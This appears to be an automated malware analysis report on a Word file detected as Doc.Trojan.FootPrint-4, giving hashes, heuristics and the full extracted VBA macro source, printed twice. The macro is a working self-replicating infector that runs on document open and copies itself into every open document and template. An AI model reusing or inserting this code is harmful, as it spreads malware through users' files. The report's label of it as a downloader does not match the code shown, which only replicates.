Office (OLE) malware analysis — malicious · 2dcbe53f232b8a6a

MALICIOUS

Office (OLE)

33.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 14ad75f480ef1723b336ec21aa1bf9a9 SHA-1: 1b92e260c3a70163a5ff245bc8775446fc9d9e91 SHA-256: 2dcbe53f232b8a6a286b1d258987342c9291811d210749909b1e807f8aae9e14

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1505.003 Server Software Component: Service Execution

The sample contains VBA macros that trigger on Document_Open. These macros export the current document's VBA project to a temporary file and then attempt to inject code from another temporary file into the current document and other templates. This behavior is indicative of a macro-based downloader or dropper.

Heuristics 3

ClamAV: Doc.Trojan.FootPrint-4 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.FootPrint-4
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1504 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1504 bytes
SHA-256: `74eb43955704138c9b7603884e2761dbffc60f5d50a97849cdb4cf21724f5dc4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Private Sub Document_New() Document_Open End Sub Private Sub Document_Open() On Error Resume Next Dim al As String Dim adoc As Document Dim atpl As Template ThisDocument.VBProject.VBComponents("ThisDocument").Export "c:\footprint.$$$" Open "c:\footprint.$$$" For Input As #1 Open "c:\footprint.$$1" For Output As #2 Line Input #1, al Line Input #1, al Line Input #1, al Line Input #1, al While Not EOF(1) Line Input #1, al Print #2, al Wend Close 1 Close 2 For Each adoc In Documents If Not adoc.CustomDocumentProperties("FootPrint") Then adoc.Sections(1).Footers(wdHeaderFooterPrimary).Range.Text = adoc.FullName adoc.CustomDocumentProperties.Add Name:="FootPrint", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean adoc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1" End If Next For Each atpl In Templates If Not atpl.CustomDocumentProperties("FootPrint") Then atpl.CustomDocumentProperties.Add Name:="FootPrint", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean atpl.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1" End If Next End Sub

SHA-256: 74eb43955704138c9b7603884e2761dbffc60f5d50a97849cdb4cf21724f5dc4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Option Explicit
Private Sub Document_New()
Document_Open
End Sub
Private Sub Document_Open()
On Error Resume Next
Dim al As String
Dim adoc As Document
Dim atpl As Template
ThisDocument.VBProject.VBComponents("ThisDocument").Export "c:\footprint.$$$"
Open "c:\footprint.$$$" For Input As #1
Open "c:\footprint.$$1" For Output As #2
Line Input #1, al
Line Input #1, al
Line Input #1, al
Line Input #1, al
While Not EOF(1)
    Line Input #1, al
    Print #2, al
Wend
Close 1
Close 2
For Each adoc In Documents
    If Not adoc.CustomDocumentProperties("FootPrint") Then
        adoc.Sections(1).Footers(wdHeaderFooterPrimary).Range.Text = adoc.FullName
        adoc.CustomDocumentProperties.Add Name:="FootPrint", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean
        adoc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1"
    End If
Next
For Each atpl In Templates
    If Not atpl.CustomDocumentProperties("FootPrint") Then
        atpl.CustomDocumentProperties.Add Name:="FootPrint", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean
        atpl.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1"
    End If
Next
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.